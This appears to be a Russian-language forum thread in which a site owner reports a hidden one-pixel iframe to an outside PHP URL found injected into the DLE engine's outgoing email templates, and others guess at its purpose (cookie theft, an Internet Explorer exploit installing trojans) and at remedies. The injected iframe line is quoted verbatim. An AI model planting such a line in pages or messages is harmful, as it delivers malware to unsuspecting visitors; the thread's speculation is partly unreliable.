Здрасти) у меня на сайте была обнаружена вот такая строчка Code: <iframe src=\"http://zabywjwzlr.biz/dl/adv448.php\" width=1 height=1></iframe> вставлена она была в формы с текстом отсылаемые юзерам при новом ПМ или о письме с \"Обратной связи\" ... Какие последствия могут быть? И чего мог добиться хакер? Спасибо)
знакомая строчка. такая приписывалась с слоите RST помоему..для IPB 2.1.6.. CraZy I izzi, последствия мы можем только гадать. Скорее всего кража кукисов..
я конечно не специалист, но я не смог бы с помощью фрейма без явы спереть куки, а вот троянчик закачать через сплойт к ослу вполне возможно
нда, макс дело говорит... что делать? Ну наверно сменить пароль на всякий пожарный. И забанить по Ip чела -)
https://forum.antichat.ru/showpost.php?p=175930&postcount=3 гм.. разные adv, но смысл тот же.. Молодец, правильно все делаешь.
Очень похоже на ссылку, которая ставится для юзания дыр ИЕ и установки тул-бара дополнительного, спайвэа и тд.... ИМХО, это она и есть... Надо порсто весь сайт выкачивать, потом полазить по файлам и найти все пароли. Все настоящие хакеры так делают!!!
dinar_007, прекрати флеймить.. ребят, вы хоть видели, что там даже сайта нет? "Fedora Core Test Page" Побоялись зайти?)
гыгы... это я к тому, что геном предложил скачать пхп файл... )) А как качалки работают я знаю... сам телепортом давно еще выкачивал всякое разное...
Мда .. но фишка в том что этот код был вписан в Админке в \"Формы для отправки писем с сайта\" ... движок ДЛЕ ... на сколько я знаю эти формы хранятся в базе ... и по-этому могу предположить что было проникновение в админку .... может я и не прав ... но всё же
Не юзал движок ДЛЕ. но если логически подумать..как сообщение могло оказаться в админке.. если никто туда не проникал? ы? Скорее всего сделали рассылку с данной ссылкой..чтобы протроянить юзеров, зареганных на сайте. как вариант.. имхо. Судя из твоих слов.
а я не исключаю возможности проникновения в админку .. был у меня случай .. форум Ipb взломали у меня .. мож тогда и было проникновение через форум в ДЛЕ ... но на сколько знаю ДЛЕ сам не сильно дырявый .. хотя .. дыры есть везде ИМХО
ослинный сплоит Redirection Status The URL was redirected to . Please click the link to go there. You can enable the automatic redirection in the settings. Generated by Opera ©